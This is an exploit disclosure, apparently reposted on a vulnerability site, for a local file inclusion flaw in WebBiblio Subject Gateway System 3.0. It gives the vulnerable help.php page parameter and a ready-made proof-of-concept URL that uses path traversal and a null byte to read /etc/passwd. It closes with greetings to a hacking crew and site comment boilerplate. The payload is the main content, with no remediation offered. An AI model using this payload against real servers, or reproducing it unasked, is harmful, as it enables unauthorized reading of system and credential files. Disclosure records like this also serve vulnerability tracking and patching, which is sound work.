WebBiblio Subject Gateway System 3.0 local file inclusion

2010.06.10

Credit: AntiSecurity

Risk: Medium

Local: No

Remote: Yes

CVE: N/A

CWE: N/A

=========================================================================================================
[o] WebBiblio Subject Gateway System Local File Inclusion Vulnerability
Software : WebBiblio version 3.0
Vendor : http://webbiblio.sourceforge.net/
Download : http://sourceforge.net/projects/webbiblio/files/
Author : AntiSecurity [ NoGe Vrs-hCk OoN_BoY Paman zxvf s4va ]
Contact : public[at]antisecurity[dot]org
Home : http://antisecurity.org/
=========================================================================================================
[o] Exploit
http://localhost/[path]/shared/help.php?page=[LFI]
[o] PoC
http://localhost/shared/help.php?page=../../../../../../../../../../../../../../../etc/passwd%00
=========================================================================================================
[o] Greetz
Angela Zhang stardustmemory aJe wishnusakti inc0mp13te pizzyroot
kaka11 matthews xrootboy martfella Genex H312Y }^-^{ k1tk4t str0ke
ArRay bjork xmazinha veter f1 akatsuchi N4ck0
all people in #evilc0de [at] irc.byroe.net
=========================================================================================================
[o] June 06 2010 - GMT +07:00 Jakarta, Indonesia

See this note in RAW Version

Vote for this issue:

50%

Thanks for you vote!

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.

Nick (*)

Email (*)

Video

Text (*)

(*) - required fields.

{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1

{{ x.comment }}

WebBiblio Subject Gateway System 3.0 local file inclusion

Thanks for you vote!

Thanks for you comment!Your message is in quarantine 48 hours.

Thanks for you comment!
Your message is in quarantine 48 hours.